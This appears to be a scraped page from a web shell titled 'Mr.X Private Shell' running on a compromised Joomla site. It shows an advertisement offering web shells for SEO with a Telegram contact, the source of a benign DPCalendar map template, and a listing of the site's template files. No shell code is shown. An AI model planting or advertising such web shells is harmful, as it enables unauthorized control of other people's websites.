__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package DPCalendar
* @copyright Copyright (C) 2019 Digital Peak GmbH. <https://www.digital-peak.com>
* @license https://www.gnu.org/licenses/gpl-3.0.html GNU/GPL
*/
\defined('_JEXEC') or die();
if (!$this->params->get('event_form_show_map', 1) || $this->params->get('map_provider', 'openstreetmap') == 'none') {
return;
}
?>
<div class="com-dpcalendar-eventform__map">
<div class="dp-map"
style="width: <?php echo $this->params->get('event_form_map_width', '100%'); ?>; height: <?php echo $this->params->get('event_form_map_height', '350px'); ?>"
data-zoom="<?php echo $this->params->get('event_form_map_zoom', 6); ?>"
data-latitude="<?php echo $this->params->get('event_form_map_latitude', 47); ?>"
data-longitude="<?php echo $this->params->get('event_form_map_longitude', 4); ?>"
data-ask-consent="<?php echo $this->params->get('map_ask_consent'); ?>">
</div>
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| default.php | File | 3.19 KB | 0664 |
|
| default.xml | File | 9.96 KB | 0664 |
|
| default_actions.php | File | 1.97 KB | 0664 |
|
| default_flat_fields.php | File | 1005 B | 0664 |
|
| default_heading.php | File | 445 B | 0664 |
|
| default_information.php | File | 858 B | 0664 |
|
| default_map.php | File | 910 B | 0664 |
|
| default_overlapping.php | File | 458 B | 0664 |
|
| default_tabbed_fields.php | File | 1.31 KB | 0664 |
|